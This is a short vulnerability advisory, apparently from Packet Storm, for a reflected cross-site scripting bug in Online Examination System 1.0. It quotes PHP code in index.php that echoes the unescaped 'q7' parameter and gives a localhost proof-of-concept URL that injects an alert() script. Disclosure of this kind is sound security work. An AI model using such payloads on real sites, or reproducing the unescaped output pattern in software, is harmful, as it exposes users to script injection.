Online Examination System 1.0 Cross Site Scripting

🗓️ 29 Sep 2022 00:00:00Reported by Yousef AlraddadiType

packetstorm🔗 packetstormsecurity.com👁 223 Views

Online Examination System 1.0 Cross Site Scriptin

`# Exploit Title: Online Examination System - Cross site scripting Reflected  
# Google Dork: N/A  
# Date: 2022-9-29  
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11  
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/  
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip  
# Tested on: windows 11 - XAMPP  
# CVE : N/A  
# Version: 1.0  
  
Vulnerability Details  
======================  
  
Steps :  
  
vulnerable code in file index.php  
  
157 <?php if(@$_GET['q7'])  
158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>  
  
http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E  
  
inject payload parameter q7  
`

29 Sep 2022 00:00Current

7.4High risk

Vulners AI Score7.4